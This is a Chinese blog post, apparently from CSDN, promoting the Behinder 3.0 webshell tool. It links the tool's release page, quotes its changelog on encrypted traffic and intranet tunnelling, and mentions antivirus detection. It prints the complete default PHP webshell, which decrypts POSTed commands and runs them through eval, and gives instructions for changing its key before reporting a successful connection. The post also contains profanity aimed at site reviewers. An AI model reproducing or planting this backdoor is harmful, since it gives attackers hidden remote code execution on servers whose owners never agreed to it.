当你的才华
还撑不起你的野心时
那你就应该静下心来学习
冰鞋下载链接:https://github.com/rebeyond/Behinder/releases
我只想说一句煞一样的CSDN审核员,对,我说的就是你,你给我好好看看,这是广告?蛲虫
昨晚就能发的,今天都还发不出去,干你。
然后被这CSDN审核一搞,都晚了不知道什么时候了,真的是起,人家分析文章都出来了,3.0.2也出来了。我丢
###2020.8.16 v3.0 Beta 1 更新日志
1.去除动态密钥协商机制,采用预共享密钥,全程无明文交互,密钥格式为md5("admin")[0:16];
2.增加了插件机制,可开发安装自定义扩展插件;
3.UI框架由awt改为javafx,重写了大量逻辑;
4.增强了内网穿透功能,在原有的基于HTTP的socks5隧道基础上,增加了单端口转发功能,可一键将内网端口映射至VPS或者本机端口;这次更新比计划提前了一个月左右,略有仓促,几个核心功能还没有完工,所以这段时间可能会密集更新:)
已有大佬进行检测,虽然放出来火绒就会杀,因为有特征,跟2.0.1一样
PS:另外还有一个需要注意的,就是别放在中文路径下,要不然会报什么数据库的dll错误
这里以默认的冰鞋3.0 PHP马子,修改默认密钥来讲解,我就是白嫖少宇大佬给的方法
<?php
@error_reporting(0);
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
$key="e45e329feb5d925b";
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
}
?>
默认密钥是:PHP密钥:rebeyond
默认密钥改密方法:总共32,截取前面16位
自己改一下密码,重新放进马子里面即可,其它马子改密相同
成功连接上冰鞋马子
虽然我们生活在阴沟里,但依然有人仰望星空!